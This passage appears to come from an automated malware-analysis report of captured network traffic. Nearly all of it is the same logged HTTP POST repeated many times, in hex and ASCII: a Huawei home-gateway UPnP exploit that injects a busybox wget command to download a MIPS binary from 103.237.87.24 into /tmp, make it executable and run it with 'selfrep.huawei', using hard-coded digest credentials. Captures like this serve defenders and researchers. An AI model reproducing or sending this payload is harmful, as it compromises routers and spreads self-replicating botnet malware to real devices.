3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 